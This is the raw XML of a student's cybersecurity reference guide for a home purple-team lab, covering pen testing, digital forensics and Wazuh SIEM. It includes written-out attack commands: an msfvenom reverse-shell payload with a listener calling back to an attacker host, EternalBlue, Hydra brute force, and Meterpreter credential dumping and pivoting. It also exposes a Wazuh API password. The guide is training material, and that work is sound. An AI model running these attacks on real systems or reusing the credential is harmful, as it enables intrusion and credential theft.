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40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INTELUX SYSTEMS, INC.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8"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Cybersecurity Reference Guide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Penetration Testing  |  Digital Forensics  |  Incident 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6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Raynard A. Porter  |  INTELUX Systems, Inc.  |  May 2026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INFORMATION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Raynard A. Porter — INTELUX Systems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reference for CIS coursework — Penetration Testing and Digital Forensics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 Environment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 Mini Rack Purple Team Lab — May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Reference — Not for Distribution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— May 17, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="24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SECTION 1 — THE CYBER KILL CHAIN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Cyber Kill Chain is a framework developed by Lockheed Martin that describes the stages of a cyberattack from initial reconnaissance to the attacker achieving their objective. Understanding each phase helps both attackers (Red Team) and defenders (Blue Team) know where to look and what to expect.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7 PHASES OF THE CYBER KILL CHAIN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Attacker Does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Blue Team Looks For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networks, finds open ports, researches targets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Firewall logs, IDS alerts, unusual scan traffic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Weaponization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malware, phishing emails, or exploit payloads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intelligence feeds, malware signatures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phishing email, drops USB, exploits web app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gateway alerts, web proxy logs, USB monitoring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Exploitation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Executes payload, exploits vulnerability, gains foothold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 alerts, process creation logs, Event ID 4688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Installs backdoor, persistence mechanism, RAT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services (7045), Run key changes (FIM), scheduled tasks (4698)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 (Command &amp; Control)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Establishes communication channel back to attacker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Unusual outbound connections, beaconing patterns, DNS anomalies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Actions on Objectives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Exfiltrates data, deploys ransomware, creates accounts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transfer anomalies, mass encryption, new admin accounts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the INTELUX Kill Chain A exercise, we operated at Phases 1 (Recon — Nmap), 3 (Delivery — xfreerdp), and 4 (Exploitation — RDP login). Phases 5–7 are next — persistence, C2, and lateral movement to DC-01.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="24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SECTION 2 — PENETRATION TESTING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What is Penetration Testing?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Penetration testing (pen testing) is an authorized, simulated cyberattack on a system to identify vulnerabilities before a real attacker does. A pen tester thinks and acts like an attacker — but with written permission and defined rules of engagement.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The Five Phases of Pen Testing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PENETRATION TESTING METHODOLOGY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Recon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 targets, open ports, services, OS fingerprinting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Nmap, Netdiscover, Shodan, theHarvester, OSINT Framework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Scanning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Enumerate services, find vulnerabilities, identify attack surface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scripts (NSE), Nikto, enum4linux, SMBclient, smbmap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Exploitation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vulnerabilities, gain access, escalate privileges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Metasploit, manual exploits, xfreerdp, Hydra, CrackMapExec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Post-Exploitation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 access, pivot to other systems, collect data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Mimikatz, Meterpreter, BloodHound, impacket, netcat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Reporting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findings, risk ratings, evidence, remediation steps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report (INTELUX-INC format), screenshots, Wazuh exports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Key Pen Testing Commands — Reference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ESSENTIAL COMMANDS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-Pn -p-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port scan, no ping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-Pn -p- 10.100.30.20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-sV -sC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version + default scripts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-sV -sC 10.100.30.20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 445 --script smb-enum-shares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Enumerate SMB shares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 445 --script smb-enum-shares 10.100.30.20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xfreerdp /v:IP /u:user /p:pass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connection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xfreerdp /v:10.100.30.20 /u:Intadm /cert:ignore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enum4linux -a IP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SMB/NetBIOS enumeration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enum4linux -a 10.100.30.10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crackmapexec smb IP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 recon and auth testing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crackmapexec smb 10.100.30.0/24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msfconsole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Metasploit Framework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then: use exploit/windows/smb/ms17_010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hydra -l user -P list.txt rdp://IP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brute force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hydra -l admin -P rockyou.txt rdp://10.100.30.20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INTELUX Lab — Kill Chain A Realistic Scenarios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SCENARIOS — REALISTIC vs LAB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World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INTELUX Lab Equivalent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Phishing email, exposed RDP, VPN credential theft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xfreerdp from KLI-01 to WKS-03 via enabled RED→BLUE rule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Outside Attacker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 in car on public WiFi — reverse shell through phishing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MBP (RED-01) on AX50 WiFi — malware on victim calls back to MBP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Mimikatz dumps LSASS memory for password hashes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Mimikatz on WKS-03 RDP session, dump hashes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Pass-the-hash or stolen plaintext to pivot to DC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dumped mwebb/dreyes hash to authenticate to DC-01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Run key, scheduled task, new admin account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registry key on WKS-03, verify Wazuh FIM catches it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="24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SECTION 3 — DIGITAL FORENSICS &amp; INCIDENT RESPONSE (DFIR)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The DFIR Process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Digital Forensics and Incident Response (DFIR) is the process of identifying, preserving, analyzing, and presenting digital evidence from a compromised system. The goal is to understand what happened, when, how, and by whom — while preserving evidence for potential legal proceedings.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DFIR PHASES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INTELUX Lab Example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Identification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the incident — alerts, anomalies, user reports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 400 alerts spike at 22:59 — auth success after failure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Containment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the bleeding — isolate the machine, block the attacker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WKS-03 NIC in Proxmox, block 10.100.40.24 in pfSense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Preservation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the drive, dump RAM — never touch the original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WKS-03 VMDK from Proxmox, take Proxmox snapshot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Analysis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Investigate artifacts — logs, registry, prefetch, memory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logs, Wazuh FIM data, tsprint.dll artifact, BAM registry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Eradication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malware, close vulnerabilities, reset credentials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 back WKS-03 to wks03-fresh-install snapshot, reset Intadm password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 Recovery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operations, verify clean state, monitor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Wazuh agent active, verify no persistence mechanisms remain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 Lessons Learned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findings, update defenses, train staff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INTELUX-INC-001, update ROE, add detection rules to Wazuh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Critical Windows Forensic Artifacts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LOOK — WINDOWS FORENSIC ARTIFACTS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Tells You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Event Log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C:\Windows\System32\winevt\Logs\Security.evtx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logins, logoffs, privilege use, account changes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Event Log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C:\Windows\System32\winevt\Logs\System.evtx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installs, driver loads, system errors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Event Log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Microsoft-Windows-TerminalServices-*.evtx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connection source IPs, session times, user names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Prefetch Files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C:\Windows\Prefetch\*.pf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program executed — name, run count, last run time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— Run Keys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HKLM\Software\Microsoft\Windows\CurrentVersion\Run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Programs set to autostart — persistence mechanism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— BAM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HKLM\System\CurrentControlSet\Services\bam\State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 Activity Monitor — records program execution per user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Shellbags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NTUSER.DAT — BagMRU/Bags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Folders the user opened — even deleted ones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LNK Files (Shortcuts)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C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent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Recently accessed files — timestamps, original path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tsprint.dll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C:\Windows\System32\spool\drivers\x64\3\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printer driver — proves RDP session was established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SRUM Database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C:\Windows\System32\sru\srudb.dat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Resource Usage — network bytes, CPU, per app per user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Pagefile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C:\pagefile.sys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overflow — may contain strings, commands, passwords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Tasks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C:\Windows\System32\Tasks\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 — attacker-created tasks survive reboots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Critical Windows Event IDs — Cheat Sheet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EVENT ID CHEAT SHEET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ID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4624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Logon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logged in, when, from where, logon type (RDP=10, network=3)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4625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 Logon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Brute force attempts — multiple failures before success is the pattern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4648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Logon with Explicit Credentials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 using stolen credentials on another machine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4672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Privileges Assigned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Admin-level access — always follows 4624 for admin logins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4688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Created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process launch — catches cmd.exe, powershell.exe, mimikatz.exe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4698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Task Created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 mechanism — attacker created a task to survive reboot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4720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Account Created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 created a backdoor account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4732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Added to Security Group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Privilege escalation — adding account to Administrators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4776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Validation (NTLM)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NTLM auth attempt — seen in pass-the-hash attacks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7045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Service Installed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Persistence — Mimikatz and many RATs install as services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1102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Cleared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 covered tracks — this itself is evidence of compromise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Forensic Investigation Commands — Windows PowerShell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Run these on a compromised machine to quickly triage what happened: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Pull recent login events (4624 = success, 4625 = failure):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Get-WinEvent -LogName Security | Where-Object {$_.Id -in 4624,4625} | Select-Object TimeCreated,Id,Message | Format-List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what programs ran recently (Prefetch):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Get-ChildItem C:\Windows\Prefetch | Sort-Object LastWriteTime -Descending | Select-Object Name,LastWriteTime | Select -First 20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persistence registry keys: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Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run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Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run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scheduled tasks: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Get-ScheduledTask | Where-Object {$_.TaskPath -notlike '\Microsoft\*'} | Select TaskName,TaskPath,State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local admin group members (has attacker added an account?):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Get-LocalGroupMember -Group Administrators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active network connections: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netstat -ano | findstr ESTABLISHED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Forensic Investigation Commands — Linux (Wazuh/SVC-01)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Pull WKS-03 auth events from Wazuh API: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-k -u wazuh-wui:'3W85Hpl91c99.KF*D9RVKSZ5c7zMDy?T' https://10.100.20.101:55000/security/user/authenticate -X POST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Query alerts for specific agent from Wazuh dashboard — use DQL filter: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agent.id: 012 AND rule.level: &gt;= 7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Memory forensics with Volatility (after RAM dump):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volatility -f memory.dmp windows.pslist     # running processes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volatility -f memory.dmp windows.netscan    # network connections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volatility -f memory.dmp windows.hashdump   # password hashes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volatility -f memory.dmp windows.cmdline    # commands run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="24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SECTION 4 — WAZUH SIEM REFERENCE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Wazuh Rule ID Reference — INTELUX Lab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6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WAZUH FIM RULE IDs — OBSERVED IN KILL CHAIN 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Integrity checksum changed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 — Medium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modified in monitored directory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deleted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 — Medium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removed from monitored path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added to the system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 — Low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file in monitored directory — tsprint.dll, srudb.dat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594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Key Integrity Checksum Changed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 — Low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key modified — Services hive, Firewall policy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598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Key Entry Added to the System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 — Low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registry key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Integrity Checksum Changed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 — Low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modified — SharedAccess Epoch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Entry Deleted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 — Low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removed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Entry Added to the System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 — Low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registry value created — Firewall rules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Wazuh — Key Locations and Credentials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INTELUX WAZUH CONFIGURATION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URL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https://10.100.20.101:443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 Host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SVC-01 — VM 100 on BLU-01 — 10.100.20.101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 Config Path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/var/ossec/etc/shared/CLIENTS/agent.conf (CLIENTS group)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FIM Scan Frequency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 seconds (5 minutes)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Monitored Paths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C:\Users, C:\Windows\System32, C:\Program Files, C:\Program Files (x86)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Registry Keys Monitored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HKLM Run, RunOnce, CurrentControlSet\Services, HKCU Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="24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SECTION 5 — OUTSIDE ATTACKER SIMULATION (MBP/RED-01)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section documents the planned simulation of a realistic outside attacker using RED-01 (MacBook Pro 2012, Parrot OS) connected to the AX50 lab router WiFi — simulating an attacker sitting in a car outside the INTELUX building.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Why This is More Realistic Than KLI-01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KLI-01 is already inside the network on VLAN 40 — equivalent to a malicious insider or someone who already breached the perimeter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RED-01 on AX50 WiFi (192.168.1.x) is outside pfSense — it cannot directly reach 10.100.30.x without a path through the firewall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real outside attacker cannot directly RDP to an internal workstation — they need a foothold first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pfSense rules will be added to help the attacker in — that would be unrealistic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The Realistic Outside Attack Chain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130"/>
        <w:gridCol w:w="31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OUTSIDE ATTACKER — REALISTIC KILL CHAIN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Implementation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Phishing / Initial Delivery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 sends email with malicious attachment or link to victim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Craft payload on RED-01, deliver via email or USB to WKS-03/04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Victim Executes Payload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Victim opens attachment — malware runs silently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Msfvenom reverse shell payload executed on WKS-03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Shell Established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Malware calls OUT to attacker — victim opens the door from inside. pfSense allows outbound. Attacker receives connection.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 connects back to RED-01 (192.168.1.x) on specified port. Meterpreter session opens on MBP.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 Has Foothold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Attacker now controls WKS-03 from outside without any firewall rule changes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Meterpreter shell on WKS-03 from MBP on AX50 WiFi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and Escalate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WKS-03 foothold, pivot to DC-01, dump credentials, own the domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Meterpreter pivot to reach DC-01 (10.100.30.10) from outside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technical fact: pfSense blocks INBOUND connections from 192.168.1.x to 10.100.30.x. But it does NOT block OUTBOUND connections from 10.100.30.x to 192.168.1.x. A reverse shell exploits this — the victim machine initiates the connection outbound, and pfSense waves it through.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Commands — Outside Attacker Simulation (Future Exercise)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RED-01 (MBP — Parrot OS) — Create reverse shell payload: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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.x LPORT=4444 -f exe -o payload.exe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RED-01 — Start listener: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msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.x; set LPORT 4444; run'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WKS-03 (simulating victim clicking) — Run the payload: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.\payload.exe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 — Meterpreter session opens on RED-01 from outside pfSense. No firewall rules modified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D4A017" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1C2E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 6 — QUICK REFERENCE CARDS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Nmap Cheat Sheet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NMAP QUICK REFERENCE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Scan Type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 scan top 1000 ports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10.100.30.0/24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ports, no ping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-Pn -p- 10.100.30.20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+ version detection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-sV 10.100.30.20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detection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-O 10.100.30.20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Aggressive scan (OS+version+scripts)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-A 10.100.30.20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 vulnerability check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 445 --script smb-vuln-* 10.100.30.20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Stealth SYN scan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-sS 10.100.30.20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 scan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-sU 10.100.30.20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results to file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-oN output.txt -oX output.xml 10.100.30.20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Metasploit Quick Reference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METASPLOIT QUICK REFERENCE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msfconsole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Metasploit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ms17_010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EternalBlue exploit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exploit/windows/smb/ms17_010_eternalblue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an exploit module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options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required settings for current module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RHOSTS 10.100.30.20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target IP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payload windows/x64/meterpreter/reverse_tcp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payload type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LHOST 10.100.40.24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attacker IP (KLI-01)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/ exploit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the exploit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 -l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active Meterpreter sessions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 -i 1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 with session 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3250"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter Post-Exploitation Quick Reference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METERPRETER QUICK REFERENCE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sysinfo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system info — OS, hostname, architecture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getuid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user context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getsystem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Attempt privilege escalation to SYSTEM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hashdump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Dump local password hashes (requires SYSTEM)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kiwi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Mimikatz module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creds_all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Dump all credentials (Mimikatz)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post/multi/recon/local_exploit_suggester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local privilege escalation exploits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portfwd add -l 3389 -p 3389 -r 10.100.30.10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forward — pivot RDP through compromised host to DC-01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persistence -h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persistence mechanism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 screenshot of victim desktop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into cmd.exe shell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 session, return to msf console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INTELUX SYSTEMS, INC. — Personal Reference — Built from live lab exercises —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6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PERSONAL REFERENCE — INTELUX SYSTEMS, INC.	Penetration Testing | Digital Forensics | Incident Response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/>
      </w:pBdr>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">INTELUX SYSTEMS — CYBERSECURITY REFERENCE GUIDE — Raynard A. Porter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2026-05-18T03:30:04.497Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T03:30:04.509Z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